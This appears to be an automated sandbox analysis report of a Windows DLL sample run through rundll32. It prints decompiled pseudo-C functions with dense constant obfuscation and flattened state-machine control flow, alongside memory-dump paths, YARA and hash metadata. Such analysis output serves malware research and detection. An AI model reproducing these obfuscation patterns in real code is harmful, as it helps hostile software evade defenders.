                                                                                                                          				signed int _t433;
                                                                                                                          				signed int _t434;
                                                                                                                          				signed int* _t437;
                                                                                                                          
                                                                                                                          				_t385 = _a8;
                                                                                                                          				_push(_t385);
                                                                                                                          				_push(_a4);
                                                                                                                          				_t423 = __ecx;
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t339);
                                                                                                                          				_v12 = 0xbcdf6a;
                                                                                                                          				_t437 =  &(( &_v148)[4]);
                                                                                                                          				_t421 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_t387 = 0xc04f77e;
                                                                                                                          				_v92 = 0x11f6ef;
                                                                                                                          				_v92 = _v92 + 0xffffb184;
                                                                                                                          				_t424 = 0x71;
                                                                                                                          				_v92 = _v92 / _t424;
                                                                                                                          				_t425 = 0x24;
                                                                                                                          				_v92 = _v92 / _t425;
                                                                                                                          				_v92 = _v92 ^ 0x0000011d;
                                                                                                                          				_v56 = 0xfaa796;
                                                                                                                          				_v56 = _v56 >> 0xc;
                                                                                                                          				_v56 = _v56 << 0xa;
                                                                                                                          				_v56 = _v56 ^ 0x003ea801;
                                                                                                                          				_v36 = 0x1650e4;
                                                                                                                          				_v36 = _v36 + 0xce7;
                                                                                                                          				_v36 = _v36 ^ 0x00165dcb;
                                                                                                                          				_v116 = 0x54bb44;
                                                                                                                          				_v116 = _v116 + 0xffff1cdd;
                                                                                                                          				_v116 = _v116 + 0xffffa99d;
                                                                                                                          				_v116 = _v116 + 0xa8e5;
                                                                                                                          				_v116 = _v116 ^ 0x00542aa3;
                                                                                                                          				_v148 = 0xce1ee6;
                                                                                                                          				_v148 = _v148 ^ 0xff8bbe67;
                                                                                                                          				_v148 = _v148 | 0x521cb43f;
                                                                                                                          				_v148 = _v148 << 1;
                                                                                                                          				_v148 = _v148 ^ 0xfebb697e;
                                                                                                                          				_v52 = 0xc2bf1c;
                                                                                                                          				_v52 = _v52 << 0xc;
                                                                                                                          				_t426 = 0x73;
                                                                                                                          				_v52 = _v52 / _t426;
                                                                                                                          				_v52 = _v52 ^ 0x0061d2eb;
                                                                                                                          				_v88 = 0x8d6fba;
                                                                                                                          				_v88 = _v88 * 0x6a;
                                                                                                                          				_v88 = _v88 * 0x21;
                                                                                                                          				_v88 = _v88 >> 0xb;
                                                                                                                          				_v88 = _v88 ^ 0x00119314;
                                                                                                                          				_v48 = 0xec8dbc;
                                                                                                                          				_v48 = _v48 + 0xffff0a61;
                                                                                                                          				_v48 = _v48 | 0x0a9d8147;
                                                                                                                          				_v48 = _v48 ^ 0x0affcc17;
                                                                                                                          				_v24 = 0xd16d2c;
                                                                                                                          				_v24 = _v24 >> 2;
                                                                                                                          				_v24 = _v24 ^ 0x003dd5e6;
                                                                                                                          				_v124 = 0xaffa28;
                                                                                                                          				_v124 = _v124 >> 9;
                                                                                                                          				_v124 = _v124 * 9;
                                                                                                                          				_v124 = _v124 ^ 0x3775f33c;
                                                                                                                          				_v124 = _v124 ^ 0x377a4e54;
                                                                                                                          				_v76 = 0x9eb952;
                                                                                                                          				_v76 = _v76 >> 0xd;
                                                                                                                          				_v76 = _v76 << 0xa;
                                                                                                                          				_v76 = _v76 ^ 0x00160abd;
                                                                                                                          				_v108 = 0x8bec79;
                                                                                                                          				_t427 = 0x28;
                                                                                                                          				_v108 = _v108 * 0x30;
                                                                                                                          				_v108 = _v108 + 0xffff86d5;
                                                                                                                          				_v108 = _v108 + 0xffff5405;
                                                                                                                          				_v108 = _v108 ^ 0x1a3a719b;
                                                                                                                          				_v132 = 0x74267e;
                                                                                                                          				_v132 = _v132 + 0x1b76;
                                                                                                                          				_v132 = _v132 << 4;
                                                                                                                          				_v132 = _v132 + 0xffff1414;
                                                                                                                          				_v132 = _v132 ^ 0x074c11a2;
                                                                                                                          				_v100 = 0x4236e1;
                                                                                                                          				_v100 = _v100 ^ 0x96e608d5;
                                                                                                                          				_v100 = _v100 / _t427;
                                                                                                                          				_t428 = 0x2d;
                                                                                                                          				_v100 = _v100 * 0x6c;
                                                                                                                          				_v100 = _v100 ^ 0x96bd808a;
                                                                                                                          				_v84 = 0xb83730;
                                                                                                                          				_v84 = _v84 + 0xffffd15d;
                                                                                                                          				_v84 = _v84 >> 0xb;
                                                                                                                          				_v84 = _v84 ^ 0x0009ec33;
                                                                                                                          				_v140 = 0x532b06;
                                                                                                                          				_v140 = _v140 ^ 0xb0124270;
                                                                                                                          				_v140 = _v140 << 1;
                                                                                                                          				_v140 = _v140 / _t428;
                                                                                                                          				_v140 = _v140 ^ 0x02279f8d;
                                                                                                                          				_v44 = 0x33dfa;
                                                                                                                          				_v44 = _v44 + 0x1c37;
                                                                                                                          				_v44 = _v44 ^ 0x000817ba;
                                                                                                                          				_v136 = 0x1bf887;
                                                                                                                          				_v136 = _v136 ^ 0x189cf430;
                                                                                                                          				_v136 = _v136 + 0xffff0896;
                                                                                                                          				_v136 = _v136 ^ 0xf213b32f;
                                                                                                                          				_v136 = _v136 ^ 0xea9313b1;
                                                                                                                          				_v144 = 0xffa314;
                                                                                                                          				_v144 = _v144 >> 7;
                                                                                                                          				_v144 = _v144 ^ 0x35f9e2de;
                                                                                                                          				_t429 = 0x1f;
                                                                                                                          				_v144 = _v144 * 0x5b;
                                                                                                                          				_v144 = _v144 ^ 0x2f3e99d8;
                                                                                                                          				_v68 = 0x41f910;
                                                                                                                          				_v68 = _v68 / _t429;
                                                                                                                          				_v68 = _v68 ^ 0x28681de5;
                                                                                                                          				_v68 = _v68 ^ 0x2865ac71;
                                                                                                                          				_v96 = 0x6e33;
                                                                                                                          				_v96 = _v96 << 4;
                                                                                                                          				_v96 = _v96 ^ 0xe7b8475a;
                                                                                                                          				_v96 = _v96 << 1;
                                                                                                                          				_v96 = _v96 ^ 0xcf7b3a2b;
                                                                                                                          				_v104 = 0xedfca3;
                                                                                                                          				_t430 = 0x5e;
                                                                                                                          				_v104 = _v104 * 0x5f;
                                                                                                                          				_v104 = _v104 | 0x0b07679d;
                                                                                                                          				_v104 = _v104 ^ 0xc050dc4c;
                                                                                                                          				_v104 = _v104 ^ 0x9b058770;
                                                                                                                          				_v112 = 0xe25509;
                                                                                                                          				_v112 = _v112 ^ 0xf6d0fdca;
                                                                                                                          				_v112 = _v112 / _t430;
                                                                                                                          				_v112 = _v112 ^ 0x02984cdf;
                                                                                                                          				_v40 = 0xf7137d;
                                                                                                                          				_v40 = _v40 << 8;
                                                                                                                          				_v40 = _v40 ^ 0xf71f8dee;
                                                                                                                          				_v64 = 0x5508e8;
                                                                                                                          				_v64 = _v64 << 4;
                                                                                                                          				_v64 = _v64 | 0x94c676b5;
                                                                                                                          				_v64 = _v64 ^ 0x95dffb87;
                                                                                                                          				_v120 = 0xc732ae;
                                                                                                                          				_t431 = 0x75;
                                                                                                                          				_v120 = _v120 / _t431;
                                                                                                                          				_v120 = _v120 << 7;
                                                                                                                          				_t432 = 0x2c;
                                                                                                                          				_v120 = _v120 / _t432;
                                                                                                                          				_v120 = _v120 ^ 0x000601dd;
                                                                                                                          				_v72 = 0x179b9;
                                                                                                                          				_v72 = _v72 >> 1;
                                                                                                                          				_v72 = _v72 << 0xb;
                                                                                                                          				_v72 = _v72 ^ 0x05ec7a60;
                                                                                                                          				_v28 = 0x46261b;
                                                                                                                          				_t433 = 0x35;
                                                                                                                          				_v28 = _v28 / _t433;
                                                                                                                          				_v28 = _v28 ^ 0x000e773f;
                                                                                                                          				_v128 = 0xfd046c;
                                                                                                                          				_v128 = _v128 << 1;
                                                                                                                          				_v128 = _v128 << 3;
                                                                                                                          				_v128 = _v128 + 0xffff42a9;
                                                                                                                          				_v128 = _v128 ^ 0x0fc89804;
                                                                                                                          				_v60 = 0xb39cb2;
                                                                                                                          				_v60 = _v60 + 0xffffa360;
                                                                                                                          				_v60 = _v60 ^ 0x6e5a7866;
                                                                                                                          				_v60 = _v60 ^ 0x6eef17c9;
                                                                                                                          				_v32 = 0xb015d5;
                                                                                                                          				_t434 = 0x33;
                                                                                                                          				_v32 = _v32 / _t434;
                                                                                                                          				_v32 = _v32 ^ 0x00082471;
                                                                                                                          				_v80 = 0x87b3ae;
                                                                                                                          				_v80 = _v80 + 0xffffe530;
                                                                                                                          				_v80 = _v80 << 2;
                                                                                                                          				_v80 = _v80 ^ 0x021b575c;
                                                                                                                          				while(_t387 != 0x5e373ec) {
                                                                                                                          					if(_t387 == 0x87b20b3) {
                                                                                                                          						_t372 =  *0x7b3dfc; // 0x0
                                                                                                                          						_t374 = E0079CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
                                                                                                                          						_t437 =  &(_t437[0x12]);
                                                                                                                          						if(_t374 == _v88) {
                                                                                                                          							 *_t385 = _v20;
                                                                                                                          							_t421 = 1;
                                                                                                                          							 *((intOrPtr*)(_t385 + 4)) = _v16;
                                                                                                                          						} else {
                                                                                                                          							_t387 = 0x5e373ec;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						if(_t387 == 0xc04f77e) {
                                                                                                                          							_t387 = 0xd382560;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t387 == 0xc68a5f7) {
                                                                                                                          								_push(_t387);
                                                                                                                          								_push(_t387);
                                                                                                                          								_t381 = E00797FF2(_v16);
                                                                                                                          								_v20 = _t381;
                                                                                                                          								if(_t381 != 0) {
                                                                                                                          									_t387 = 0x87b20b3;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t387 != 0xd382560) {
                                                                                                                          									L14:
                                                                                                                          									if(_t387 != 0x4d23f0b) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t382 =  *0x7b3dfc; // 0x0
                                                                                                                          									_t384 = E0079CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                          									_t437 =  &(_t437[0x12]);
                                                                                                                          									if(_t384 == _v148) {
                                                                                                                          										_t387 = 0xc68a5f7;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t421;
                                                                                                                          				}
                                                                                                                          				E007A8519(_v32, _v80, _v20);
                                                                                                                          				_t387 = 0x4d23f0b;
                                                                                                                          				goto L14;
                                                                                                                          			}





























































                                                                                                                          0x007964bd
                                                                                                                          0x0079635f
                                                                                                                          0x0079635f
                                                                                                                          0x007963bd
                                                                                                                          0x007963c2
                                                                                                                          0x007963c9
                                                                                                                          0x007963cf
                                                                                                                          0x00000000
                                                                                                                          0x007963cf
                                                                                                                          0x007963c9
                                                                                                                          0x00796359
                                                                                                                          0x0079634d
                                                                                                                          0x00796341
                                                                                                                          0x007964e1
                                                                                                                          0x007964e1
                                                                                                                          0x007964a6
                                                                                                                          0x007964ac
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                          • API String ID: 0-1604698900
                                                                                                                          • Opcode ID: 273eb08752a5aad7e6ad1cd1c7ceb02e7e4ba07a57601fcfb2bed014858a475f
                                                                                                                          • Instruction ID: a614711c57efbd53c84cc5eb1c692b3021da2bfed918974b908b7aeafa8064cc
                                                                                                                          • Opcode Fuzzy Hash: 273eb08752a5aad7e6ad1cd1c7ceb02e7e4ba07a57601fcfb2bed014858a475f
                                                                                                                          • Instruction Fuzzy Hash: 43F11F715083809FC768CF65D589A4BBBF1FBC4B48F50891DF29A86260C7B68949CF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Version$ClipboardFormatRegister
                                                                                                                          • String ID: MSWHEEL_ROLLMSG
                                                                                                                          • API String ID: 2888461884-2485103130
                                                                                                                          • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                          • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                          • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                          • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007970B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				void* _t276;
                                                                                                                          				intOrPtr _t301;
                                                                                                                          				void* _t302;
                                                                                                                          				intOrPtr _t305;
                                                                                                                          				void* _t306;
                                                                                                                          				intOrPtr _t312;
                                                                                                                          				intOrPtr* _t314;
                                                                                                                          				void* _t316;
                                                                                                                          				intOrPtr _t340;
                                                                                                                          				signed int _t343;
                                                                                                                          				signed int _t344;
                                                                                                                          				signed int _t345;
                                                                                                                          				signed int _t346;
                                                                                                                          				signed int _t347;
                                                                                                                          				signed int _t348;
                                                                                                                          				signed int _t349;
                                                                                                                          				signed int* _t352;
                                                                                                                          
                                                                                                                          				_t342 = _a4;
                                                                                                                          				_t314 = __edx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t276);
                                                                                                                          				_v8 = 0xc5496b;
                                                                                                                          				_t340 = 0;
                                                                                                                          				_v4 = 0;
                                                                                                                          				_t352 =  &(( &_v128)[5]);
                                                                                                                          				_v96 = 0xa893e5;
                                                                                                                          				_v96 = _v96 >> 0xb;
                                                                                                                          				_t316 = 0x77ea95;
                                                                                                                          				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                          				_v96 = _v96 + 0xffff5908;
                                                                                                                          				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                          				_v120 = 0x460837;
                                                                                                                          				_v120 = _v120 << 0xe;
                                                                                                                          				_t343 = 0x61;
                                                                                                                          				_v120 = _v120 / _t343;
                                                                                                                          				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                          				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                          				_v100 = 0x5f60bb;
                                                                                                                          				_t344 = 0x67;
                                                                                                                          				_v100 = _v100 / _t344;
                                                                                                                          				_v100 = _v100 << 2;
                                                                                                                          				_v100 = _v100 << 0xe;
                                                                                                                          				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                          				_v104 = 0xcda695;
                                                                                                                          				_t345 = 0x65;
                                                                                                                          				_v104 = _v104 * 0x11;
                                                                                                                          				_v104 = _v104 + 0xffffbfc8;
                                                                                                                          				_v104 = _v104 / _t345;
                                                                                                                          				_v104 = _v104 ^ 0x00229cab;
                                                                                                                          				_v88 = 0xcb9151;
                                                                                                                          				_v88 = _v88 + 0x59e9;
                                                                                                                          				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                          				_v88 = _v88 >> 0xc;
                                                                                                                          				_v88 = _v88 ^ 0x0007c412;
                                                                                                                          				_v124 = 0xc27732;
                                                                                                                          				_v124 = _v124 << 5;
                                                                                                                          				_v124 = _v124 * 0x69;
                                                                                                                          				_v124 = _v124 >> 0xd;
                                                                                                                          				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                          				_v108 = 0xd451e;
                                                                                                                          				_v108 = _v108 | 0x03d9c36b;
                                                                                                                          				_v108 = _v108 << 0x10;
                                                                                                                          				_v108 = _v108 >> 7;
                                                                                                                          				_v108 = _v108 ^ 0x018efe00;
                                                                                                                          				_v24 = 0xe3266e;
                                                                                                                          				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                          				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                          				_v60 = 0xdd6dbc;
                                                                                                                          				_v60 = _v60 << 0xc;
                                                                                                                          				_v60 = _v60 >> 0xd;
                                                                                                                          				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                          				_v92 = 0xdc27c1;
                                                                                                                          				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                          				_t346 = 0x51;
                                                                                                                          				_v92 = _v92 / _t346;
                                                                                                                          				_v92 = _v92 >> 0xb;
                                                                                                                          				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                          				_v28 = 0x55985f;
                                                                                                                          				_t347 = 0x64;
                                                                                                                          				_v28 = _v28 * 0x1f;
                                                                                                                          				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                          				_v64 = 0x4cb0ae;
                                                                                                                          				_v64 = _v64 * 0x59;
                                                                                                                          				_v64 = _v64 + 0xffff44f7;
                                                                                                                          				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                          				_v32 = 0x4c255b;
                                                                                                                          				_v32 = _v32 >> 0xc;
                                                                                                                          				_v32 = _v32 ^ 0x000ba021;
                                                                                                                          				_v68 = 0x1bdf1a;
                                                                                                                          				_v68 = _v68 << 0xe;
                                                                                                                          				_v68 = _v68 << 8;
                                                                                                                          				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                          				_v36 = 0xeace7c;
                                                                                                                          				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                          				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                          				_v52 = 0x5778bf;
                                                                                                                          				_v52 = _v52 * 0x53;
                                                                                                                          				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                          				_v56 = 0x56e07;
                                                                                                                          				_v56 = _v56 / _t347;
                                                                                                                          				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                          				_v128 = 0x2ec397;
                                                                                                                          				_v128 = _v128 + 0xffff4016;
                                                                                                                          				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                          				_v128 = _v128 << 0xa;
                                                                                                                          				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                          				_v112 = 0x486dea;
                                                                                                                          				_t159 =  &_v112; // 0x486dea
                                                                                                                          				_t348 = 0x16;
                                                                                                                          				_v112 =  *_t159 * 0x75;
                                                                                                                          				_v112 = _v112 << 3;
                                                                                                                          				_v112 = _v112 + 0xffff4e4a;
                                                                                                                          				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                          				_v116 = 0xad5672;
                                                                                                                          				_v116 = _v116 << 0xa;
                                                                                                                          				_v116 = _v116 * 0x32;
                                                                                                                          				_v116 = _v116 >> 1;
                                                                                                                          				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                          				_v40 = 0x750aef;
                                                                                                                          				_v40 = _v40 << 0xe;
                                                                                                                          				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                          				_v72 = 0x7e8fee;
                                                                                                                          				_v72 = _v72 << 0xe;
                                                                                                                          				_v72 = _v72 + 0x885b;
                                                                                                                          				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                          				_v44 = 0x717d1a;
                                                                                                                          				_v44 = _v44 >> 0xf;
                                                                                                                          				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                          				_v48 = 0x815897;
                                                                                                                          				_v48 = _v48 / _t348;
                                                                                                                          				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                          				_v76 = 0xfbb4ce;
                                                                                                                          				_v76 = _v76 << 8;
                                                                                                                          				_v76 = _v76 + 0xffffed69;
                                                                                                                          				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                          				_v80 = 0xf07394;
                                                                                                                          				_v80 = _v80 << 0xf;
                                                                                                                          				_v80 = _v80 ^ 0x34c45092;
                                                                                                                          				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                          				_v84 = 0xfdde74;
                                                                                                                          				_v84 = _v84 * 0x78;
                                                                                                                          				_v84 = _v84 << 7;
                                                                                                                          				_v84 = _v84 << 0xa;
                                                                                                                          				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                          				_v20 = 0xbaf80d;
                                                                                                                          				_t349 = 0x4e;
                                                                                                                          				_v20 = _v20 / _t349;
                                                                                                                          				_v20 = _v20 ^ 0x000183d9;
                                                                                                                          				do {
                                                                                                                          					while(_t316 != 0x77ea95) {
                                                                                                                          						if(_t316 == 0x220b753) {
                                                                                                                          							_t301 =  *0x7b3dfc; // 0x0
                                                                                                                          							_t302 = E007A5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                          							_t352 =  &(_t352[0x10]);
                                                                                                                          							if(_t302 == _v88) {
                                                                                                                          								_t316 = 0xd86d689;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t316 == 0xd7ced6e) {
                                                                                                                          								_t305 =  *0x7b3dfc; // 0x0
                                                                                                                          								_t306 = E007A5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                          								_t352 =  &(_t352[0x10]);
                                                                                                                          								if(_t306 == _v108) {
                                                                                                                          									 *_t314 = _v16;
                                                                                                                          									_t340 = 1;
                                                                                                                          									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                          								} else {
                                                                                                                          									_t316 = 0xf392ab6;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t316 == 0xd86d689) {
                                                                                                                          									_push(_t316);
                                                                                                                          									_push(_t316);
                                                                                                                          									_t312 = E00797FF2(_v12);
                                                                                                                          									_v16 = _t312;
                                                                                                                          									if(_t312 != 0) {
                                                                                                                          										_t316 = 0xd7ced6e;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t316 != 0xf392ab6) {
                                                                                                                          										goto L14;
                                                                                                                          									} else {
                                                                                                                          										E007A8519(_v84, _v20, _v16);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L17:
                                                                                                                          						return _t340;
                                                                                                                          					}
                                                                                                                          					_t316 = 0x220b753;
                                                                                                                          					L14:
                                                                                                                          				} while (_t316 != 0xf4b6a65);
                                                                                                                          				goto L17;
                                                                                                                          			}




















































                                                                                                                          0x00797542
                                                                                                                          0x00797547
                                                                                                                          0x0079754e
                                                                                                                          0x007975d7
                                                                                                                          0x007975d9
                                                                                                                          0x007975e1
                                                                                                                          0x00797550
                                                                                                                          0x00797550
                                                                                                                          0x00000000
                                                                                                                          0x00797550
                                                                                                                          0x00797493
                                                                                                                          0x00797499
                                                                                                                          0x007974d4
                                                                                                                          0x007974d5
                                                                                                                          0x007974d6
                                                                                                                          0x007974db
                                                                                                                          0x007974e6
                                                                                                                          0x007974ec
                                                                                                                          0x00000000
                                                                                                                          0x007974ec
                                                                                                                          0x0079749b
                                                                                                                          0x007974a1
                                                                                                                          0x00000000
                                                                                                                          0x007974a7
                                                                                                                          0x007974b6
                                                                                                                          0x007974bb
                                                                                                                          0x007974a1
                                                                                                                          0x00797499
                                                                                                                          0x00797491
                                                                                                                          0x007975e4
                                                                                                                          0x007975f0
                                                                                                                          0x007975f0
                                                                                                                          0x007975be
                                                                                                                          0x007975c0
                                                                                                                          0x007975c0
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                          • API String ID: 0-2314355462
                                                                                                                          • Opcode ID: 7890cb327afa20de764dd6354e3ad81f0e20bc0d0682cb8ba5a8cadd32ec1eb4
                                                                                                                          • Instruction ID: 2cf437b05677039594bca45122a5bf46e0d903f2c4e9c0d3ba80b0bacf175e25
                                                                                                                          • Opcode Fuzzy Hash: 7890cb327afa20de764dd6354e3ad81f0e20bc0d0682cb8ba5a8cadd32ec1eb4
                                                                                                                          • Instruction Fuzzy Hash: BFD10E7110C3819FC768CF65D48A91BFBE1BBC4748F50891DF6A68A220C7B6C959CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E007AC631(void* __ecx) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				unsigned int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				void* _t214;
                                                                                                                          				void* _t220;
                                                                                                                          				void* _t224;
                                                                                                                          				void* _t228;
                                                                                                                          				void* _t229;
                                                                                                                          				void* _t233;
                                                                                                                          				void* _t234;
                                                                                                                          				signed int _t236;
                                                                                                                          				signed int _t237;
                                                                                                                          				signed int _t238;
                                                                                                                          				void* _t248;
                                                                                                                          				void* _t249;
                                                                                                                          				signed int* _t251;
                                                                                                                          				void* _t254;
                                                                                                                          
                                                                                                                          				_t251 =  &_v92;
                                                                                                                          				_t234 = __ecx;
                                                                                                                          				_v56 = 0x6c25e6;
                                                                                                                          				_v56 = _v56 >> 0xf;
                                                                                                                          				_v56 = _v56 >> 0xd;
                                                                                                                          				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                          				_v60 = 0xfeb19f;
                                                                                                                          				_v60 = _v60 | 0xe5cfed25;
                                                                                                                          				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                          				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                          				_v20 = 0x71f317;
